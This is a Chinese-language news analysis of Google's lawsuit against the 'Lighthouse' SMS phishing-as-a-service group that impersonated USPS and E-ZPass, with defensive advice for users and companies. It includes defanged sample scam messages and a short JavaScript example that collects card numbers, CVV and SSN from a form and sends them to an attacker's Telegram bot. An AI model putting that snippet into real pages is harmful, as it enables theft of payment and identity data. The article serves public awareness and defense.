2026年1月,科技巨头Google罕见地将法律武器对准了一个盘踞在暗影中的网络犯罪组织。据SunTCI等多家媒体披露,Google于1月15日正式向美国联邦法院提起诉讼,指控一个主要活动于境外的跨国团伙长期利用美国民众高度信任的公共服务品牌——E-ZPass(电子道路收费系统)与USPS(美国邮政服务)——实施大规模短信钓鱼(Smishing)攻击。
这并非一次普通的民事索赔。根据起诉书,该团伙被指运营名为“Lighthouse”(灯塔)的钓鱼即服务(Phishing-as-a-Service, PhaaS)平台,在全球120多个国家累计诱骗超过100万受害者,仅在美国就涉嫌窃取1270万至1.15亿张信用卡信息。更令人震惊的是,其内部结构高度组织化:设有“数据经纪”“短信投送”“凭证盗用”三大职能组,并通过公开Telegram频道招募成员、共享工具、测试漏洞,俨然一个“企业化运营”的网络犯罪工厂。
Google此举被业内视为科技公司从“被动防御”转向“主动清源”的标志性事件。而在地球另一端,中国的网络安全从业者正密切关注这场跨国围剿背后的攻防逻辑——因为类似的短信诈骗模式,早已悄然渗透进国内用户的手机屏幕。
一、“通行费未付”“包裹异常”:精心设计的信任陷阱
典型的Lighthouse攻击始于一条看似无害的短信:
【USPS】您的包裹#9876543因地址不详无法投递,请立即更新配送信息:hxxps://usps-delivery[.]top/track
或
【E-ZPass】您有一笔$48.50的未缴通行费,逾期将产生罚款并影响信用记录。点击支付:hxxps://ezpass-pay[.]xyz/bill
这些消息精准击中了现代人的两大焦虑点:物流中断与信用受损。而攻击者深谙心理学——他们不仅模仿官方通知的格式,还刻意使用“.top”“.xyz”等廉价域名,制造“临时系统页面”的错觉;链接短小、无明显拼写错误,甚至部分页面会动态加载USPS官网的CSS资源,以通过浏览器的内容安全策略(CSP)检查,增强“合法性”。
“关键在于,他们盗用的是‘公共信任资产’。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“USPS和E-ZPass不是普通商业品牌,而是政府关联的公共服务。用户天然认为它们不会发诈骗信息——这种信任被系统性地武器化了。”
一旦用户点击链接,便会进入一个高仿登录页。页面要求输入姓名、信用卡号、CVV码、甚至社保号码(SSN),声称用于“身份验证”或“小额预授权”。而实际上,所有数据都会实时回传至攻击者的Telegram机器人或云数据库。
// 钓鱼页面典型数据回传代码(简化示例)
document.getElementById('payment-form').addEventListener('submit', (e) => {
e.preventDefault();
const data = {
name: document.getElementById('name').value,
card: document.getElementById('card').value,
cvv: document.getElementById('cvv').value,
ssn: document.getElementById('ssn').value
};
// 通过隐蔽的Webhook发送至攻击者控制的Telegram Bot
fetch('https://api.telegram.org/bot<TOKEN>/sendMessage', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
chat_id: '<ATTACKER_CHAT_ID>',
text: JSON.stringify(data)
})
});
// 伪造“支付成功”页面,降低用户警觉
window.location.href = '/success.html';
});
这种“小额支付+高敏感信息索取”的组合,极大提高了转化率。受害者往往在数日后收到银行盗刷通知,才意识到自己落入陷阱。
二、“Lighthouse”平台:钓鱼即服务的工业化流水线
Google在起诉书中首次详细披露了“Lighthouse”平台的运作机制。它并非单一网站,而是一个模块化的SaaS式工具包,允许犯罪分子通过图形界面快速生成钓鱼站点。
据内部调查,该平台提供以下功能:
品牌模板库:预置USPS、E-ZPass、FedEx、IRS(美国国税局)、甚至Google自己的登录页模板;
动态域名绑定:自动从域名注册商API批量注册新域名,并绑定至钓鱼页面;
Telegram集成:所有窃取的数据实时推送至指定频道,支持多成员协作处理;
反侦察开关:可启用IP地理围栏、浏览器指纹检测、爬虫拦截等功能(与Barracuda报告中描述的技术高度一致)。
更值得警惕的是,该平台采用“订阅制”或“按成功转化分成”模式运营。任何具备基础网络知识的人,只需支付几十美元,即可发起一场国家级水平的钓鱼攻击。
“这彻底降低了网络犯罪的门槛。”芦笛说,“过去需要编写代码、租服务器、设计页面,现在就像开网店一样简单。Lighthouse就是钓鱼界的‘Shopify’。”
Google称,其已识别出超过100个使用Google品牌元素(如Gmail登录界面)的Lighthouse模板,并发现该团伙曾滥用Google Voice号码进行二次验证绕过或客服冒充。
三、跨国协同:从Telegram频道到“诈骗园区”
此次诉讼揭示了一个令人不安的事实:网络犯罪已形成完整的全球产业链。
根据Google提交的证据,该团伙约2500名成员在一个公开Telegram频道中活跃。频道内不仅有新手教程(如“如何绕过Cloudflare人机验证”),还有“模板评测”“域名推荐”“变现渠道分享”等板块。部分高级成员甚至提供“代运营”服务——你出钱,我帮你发短信、建站、洗钱。
而资金流向则指向东南亚某些“诈骗园区”。这些园区表面是科技公司,实则为跨国犯罪集团提供物理庇护、本地SIM卡池、甚至人力支持(如“话务员”冒充客服二次行骗)。
这种模式对中国有何警示?芦笛指出:“国内近年高发的‘医保停用’‘ETC失效’‘快递理赔’类短信诈骗,手法与Lighthouse如出一辙。区别只在于冒充的品牌从USPS变成了‘国家医保局’或‘中国邮政’。”
事实上,2025年中国工信部通报的典型诈骗案例中,就有团伙利用“.shop”“.online”域名搭建高仿“国家社会保险公共服务平台”,诱导用户输入身份证号和银行卡信息。其页面结构、表单字段、甚至错误提示语,都与Lighthouse模板高度相似。
“我们有理由相信,部分国内诈骗团伙正在使用同源或仿制的PhaaS工具。”芦笛强调,“只是他们更聚焦本土化品牌,且通信渠道从Telegram转向了境内加密群聊或境外小众IM。”
四、法律+技术双轨出击:Google的“生态清剿”战略
值得注意的是,Google此次诉讼并非孤立行动。公司同步宣布支持三项美国国会正在审议的反诈法案:
GUARD法案:加强对老年人等易受害群体的通信保护;
《外国非法机器人电话消除法》:建立跨部门工作组打击境外呼入诈骗;
《诈骗园区问责与动员法案》:授权制裁为诈骗提供物理空间的海外实体。
同时,Google在产品层面加速部署防御措施:
Google Messages内置AI垃圾短信识别:可实时标记可疑链接;
Key Verifier工具:帮助用户验证发件人是否为官方认证账号;
Search与Ads政策收紧:禁止推广任何涉及“紧急付款”“账户冻结”等话术的落地页。
“Google意识到,仅靠删除单个钓鱼页面是徒劳的。”芦笛分析,“必须摧毁其基础设施、切断其资金流、瓦解其组织网络——这才是‘治本’。”
这种“法律+技术+政策”三位一体的策略,值得国内平台借鉴。目前,国内主流手机厂商虽已集成短信风险提示,但对钓鱼域名的实时阻断、对PhaaS平台的溯源打击仍显不足。
五、防御启示:从“不点链接”到“重建信任链”
面对日益工业化的短信钓鱼,公众该如何自保?
首要原则仍是:合法机构绝不会通过短信索要敏感信息或要求点击链接完成紧急支付。无论是USPS、E-ZPass,还是中国的社保、税务、银行系统,其官方通知只会引导用户登录已知官网,而非提供短链接。
但芦笛提醒,仅靠“不点链接”已不够。“攻击者正在利用‘信任链污染’——他们让钓鱼页面看起来像真的,让短信看起来像官方发的,甚至让后续的‘客服电话’听起来像真的。”
因此,他建议采取以下进阶防护:
手动输入官网地址:永远不要通过短信、邮件中的链接访问金融或政务平台;
启用双重验证(2FA):即使密码泄露,也能阻止账户接管;
监控信用卡小额交易:许多钓鱼团伙会先尝试1美元扣款测试卡有效性;
举报可疑短信:通过运营商或国家反诈专线(如96110)上报,助力情报汇聚。
对企业而言,则需加强品牌保护:
注册核心业务相关域名(包括常见拼写错误变体);
与搜索引擎、应用商店建立快速下架通道;
部署基于行为分析的Web流量监控,识别异常表单提交。
六、结语:当公共服务成为攻击跳板,全民防御体系亟待升级
Google起诉Lighthouse团伙,不仅是对一个犯罪组织的清算,更是对整个网络诈骗生态的宣战。它揭示了一个残酷现实:在数字时代,最危险的漏洞不在代码里,而在人类对公共服务的信任中。
而这场战争没有旁观者。从Mountain View到中关村,从USPS到中国邮政,攻击者的手法正在趋同,防御者的策略也必须联动。正如芦笛所言:“打击PhaaS不能只靠科技巨头。我们需要立法者划定红线,平台方筑牢堤坝,公众提升免疫力——唯有如此,才能让‘灯塔’照见黑暗,而非成为引诱船只触礁的假航标。”
编辑:芦笛(公共互联网反网络钓鱼工作组)
